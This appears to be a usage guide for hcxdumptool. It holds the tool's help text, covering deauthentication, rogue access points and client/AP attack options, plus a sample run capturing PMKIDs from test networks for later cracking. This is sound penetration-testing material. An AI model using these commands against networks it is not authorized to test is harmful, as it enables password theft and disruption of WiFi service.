Install hcxtools.
hcxdumptool <options>
hcxdumptool 6.0.5 (C) 2020 ZeroBeat
press the switch to terminate hcxdumptool
hardware modification is necessary, read more:
https://github.com/ZerBea/hcxdumptool/tree/master/docs
do not run hcxdumptool on logical (NETLINK) interfaces (monx, wlanxmon)
do not use hcxdumptool in combination with 3rd party tools, which take access to the interface (except: tshark, wireshark, tcpdump)
short options:
-i <interface> : interface (monitor mode will be enabled by hcxdumptool)
some Realtek interfaces require NETLINK to set monitor mode
in this case try iw:
ip link set <interface> down
iw dev <interface> set type monitor
ip link set <interface> up
WARNING:
hcxdumptool may not work as expected on virtual NETLINK interfaces
do not report issues related to iw
-o <dump file> : output file in pcapng format
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-f <frames> : frames to save
bitmask:
0: clear default values
1: MANAGEMENT frames (default)
2: EAP and EAPOL frames (default)
4: IPV4 frames
8: IPV6 frames
16: WEP encrypted frames
32: WPA encrypted frames
to clear default values use -f 0 first, followed by desired frame type (e.g. -f 0 -f 4)
-c <digit> : set scan list (1,2,3, ...)
default scan list: 1...13
maximum entries: 127
allowed channels (depends on the device):
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 68, 96
100, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128
132, 134, 136, 138, 140, 142, 144, 149, 151, 153, 155, 157, 159
161, 165, 169, 173
-t <seconds> : stay time on channel before hopping to the next channel
default 4 seconds
-m <interface> : set monitor mode by ioctl() system call and quit
-I : show WLAN interfaces and quit
-C : show available channels and quit
if no channels are available, interface is probably in use or doesn't support monitor mode
long options:
--do_rcascan : show radio channel assignment (scan for target access points)
this can be used to test that ioctl() calls and packet injection is working
if you got no HIT, packet injection is possible not working
also it can be used to get information about the target
and to determine that the target is in range
use this mode to collect data for the filter list
run this mode at least for 2 minutes
to save all received raw packets use option -o
--reason_code=<digit> : deauthentication reason code
recommended codes:
1 WLAN_REASON_UNSPECIFIED
2 WLAN_REASON_PREV_AUTH_NOT_VALID
4 WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY
5 WLAN_REASON_DISASSOC_AP_BUSY
6 WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA
7 WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA (default)
9 WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH
--disable_client_attacks : do not attack clients
affected: ap-less (EAPOL 2/4 - M2) attack
--disable_ap_attacks : do not attack access points
affected: connected clients and client-less (PMKID) attack
--stop_ap_attacks=<digit> : stop attacks against ACCESS POINTs if <n> BEACONs received
default: stop after 600 BEACONs
--resume_ap_attacks=<digit> : resume attacks against ACCESS POINTs after <n> BEACONs received
default: 864000 BEACONs
--disable_deauthentication : do not send deauthentication or disassociation frames
affected: conntected clients
--silent : do not transmit!
hcxdumptool is acting like a passive dumper
expect possible packet loss
--eapoltimeout=<digit> : set EAPOL TIMEOUT (microseconds)
default: 20000 usec
--bpfc=<file> : input Berkeley Packet Filter (BPF) code
steps to create a BPF (it only has to be done once):
set hcxdumptool monitormode
$ hcxumptool -m <interface>
create BPF to protect a MAC
$ tcpdump -i <interface> not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf
recommended to protect own devices
or create BPF to attack a MAC
$ tcpdump -i <interface> wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 -ddd > attack.bpf
not recommended, because important pre-authentication frames will be lost due to MAC randomization of the CLIENTs
use the BPF code
$ hcxumptool -i <interface> --bpfc=attack.bpf ...
see man pcap-filter for a list of all filter options
--filterlist_ap=<file> : ACCESS POINT MAC filter list
format: 112233445566 + comment
maximum entries 256
run first --do_rcascan to retrieve information about the target
--filterlist_client=<file> : CLIENT MAC filter list
format: 112233445566 # comment
maximum entries 256
due to MAC randomization of the CLIENT, it does not always work!
--filtermode=<digit> : mode for filter list
mandatory in combination with --filterlist_ap and/or --filterlist_client
0: ignore filter list (default)
1: use filter list as protection list
do not interact with ACCESS POINTs and CLIENTs from this list
2: use filter list as target list
only interact with ACCESS POINTs and CLIENTs from this list
not recommended, because important pre-authentication frames will be lost due to MAC randomization of the CLIENTs
--weakcandidate=<password> : use this pre shared key (8...63 characters) for weak candidate alert
will be saved to pcapng to inform hcxpcaptool
default:
--mac_ap : use this MAC as ACCESS POINT MAC instead of a randomized one
format: 112233445566
--mac_client : use this MAC as CLIENT MAC instead of a randomized one
format: 112233445566
--essidlist=<file> : transmit beacons from this ESSID list
maximum entries: 256 ESSIDs
--active_beacon : transmit beacon once every 200000 usec
affected: ap-less
--flood_beacon : transmit beacon on every received beacon
affected: ap-less
--infinity : prevent that a CLIENT can establish a connection to an assigned ACCESS POINT
affected: ACCESS POINTs and CLIENTs
--use_gps_device=<device> : use GPS device
/dev/ttyACM0, /dev/ttyUSB0, ...
NMEA 0183 $GPGGA $GPGGA
--use_gpsd : use GPSD device
NMEA 0183 $GPGGA, $GPRMC
--nmea=<file> : save track to file
format: NMEA 0183 $GPGGA, $GPRMC, $GPWPL
to convert it to gpx, use GPSBabel:
gpsbabel -i nmea -f hcxdumptool.nmea -o gpx -F file.gpx
to display the track, open file.gpx with viking
--gpio_button=<digit> : Raspberry Pi GPIO pin number of button (2...27)
default = GPIO not in use
--gpio_statusled=<digit> : Raspberry Pi GPIO number of status LED (2...27)
default = GPIO not in use
--tot=<digit> : enable timeout timer in minutes (minimum = 2 minutes)
: hcxdumptool will terminate if tot reached (EXIT code = 2)
--error_max=<digit> : terminate hcxdumptool if error maximum reached
default: 100 errors
--reboot : once hcxdumptool terminated, reboot system
--poweroff : once hcxdumptool terminated, power off system
--enable_status=<digit> : enable real-time display (waterfall)
only incoming traffic
only once at the first occurrence due to MAC randomization of CLIENTs
bitmask:
0: no status (default)
1: EAP and EAPOL
2: ASSOCIATION and REASSOCIATION
4: AUTHENTICATION
8: BEACON and PROBERESPONSE
16: ROGUE AP
32: GPS (once a minute)
64: internal status (once a minute)
128: run as server
256: run as client
characters < 0x20 && > 0x7e are replaced by .
example: show everything but don't run as server or client (1+2+4+8+16 = 31)
show only EAP and EAPOL and ASSOCIATION and REASSOCIATION (1+2 = 3)
--server_port=<digit> : define port for server status output (1...65535)
: default IP: 224.0.0.255
: default port: 60123
--client_port=<digit> : define port for client status read (1...65535)
: default IP: 224.0.0.255
: default port: 60123
--check_driver : run several tests to determine that driver support all(!) required ioctl() system calls
--check_injection : run packet injection test to determine that driver support full packet injection
the driver must support monitor mode and full packet injection
otherwise hcxdumptool will not work as expected
--help : show this help
--version : show version
Run hcxdumptool -i interface --do_rcascan for at least 30 seconds, to get information about the target!
Do not edit, merge or convert this pcapng files, because it will remove optional comment fields!
It is much better to run gzip to compress the files. Wireshark, tshark and hcxpcapngtool will understand this.
If hcxdumptool captured your password from WiFi traffic, you should check all your devices immediately!
If you use GPS, make sure GPS device is inserted and has a GPS FIX, before you start hcxdumptool!
To start you have to stop both ‘NetworkManager’ and ‘wpa_supplicant’ service. After you’re done, reverse this process by starting the services.
To start:
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
To stop:
sudo systemctl start NetworkManager.service
sudo systemctl start wpa_supplicant.service
$ sudo hcxdumptool -i wlp4s0 -o dumpfile.pcapng --active_beacon --enable_status=15
initialization...
start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
INTERFACE NAME............: wlp4s0
INTERFACE HARDWARE MAC....: ac12345698c14
DRIVER....................: iwlwifi
DRIVER VERSION............: 5.15.11-76051511-generic
DRIVER FIRMWARE VERSION...: 36.ca7b901d.0 8265-36.ucode
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ROGUE (ACCESS POINT)......: 8ce7481dfb97 (BROADCAST HIDDEN)
ROGUE (ACCESS POINT)......: 8ce74800fb98 (BROADCAST OPEN)
ROGUE (ACCESS POINT)......: 8ce7481dfb99 (incremented on every new client)
ROGUE (CLIENT)............: e80410d52f0c
EAPOLTIMEOUT..............: 20000 usec
REPLAYCOUNT...............: 64387
ANONCE....................: 2d27c84b6a739c47f0f42e5e038712d1c3add44a516b5972d144b424e3346035
SNONCE....................: 8eeedb3d57ab1b059ffa4da4c07bb43f790cf83f3d6d32c9e77fa3b82b768624
11:59:17 1 ffffffffffff c8[REDACTED]e0 OFFSEC [BEACON]
11:59:17 1 e80410d52f0c c8[REDACTED]e0 OFFSEC [PMKIDROGUE:2e48084[REDACTED]48b418e6e5 KDV:2]
11:59:18 1 ffffffffffff c8[REDACTED]e1 OFFSEC-G [BEACON]
11:59:19 1 e80410d52f0c c8[REDACTED]e1 OFFSEC-G [PMKIDROGUE:576f36[REDACTED]cedfef KDV:2]
11:59:24 11 ffffffffffff c8[REDACTED]e0 OFFSEC [BEACON]
11:59:24 11 ffffffffffff c8[REDACTED]e1 OFFSEC-G [BEACON]
11:59:25 11 e80410d52f0c c8[REDACTED]e1 OFFSEC-G [PMKIDROGUE:61fa5d[REDACTED]2585f44 KDV:2]
^C
terminating...
Use hcxpcapngtool to convert the .pcap to crackable hashes.
$ sudo hcxdumptool -i wlp4s0 --do_rcascan
BSSID CH COUNT HIT ESSID [16:00:50]
---------------------------------------------------------------
c8[REDACTED]e1 11 67 7 OFFSEC-G
c8[REDACTED]e0 11 64 6 OFFSEC
c8[REDACTED]e1 1 17 3 OFFSEC-G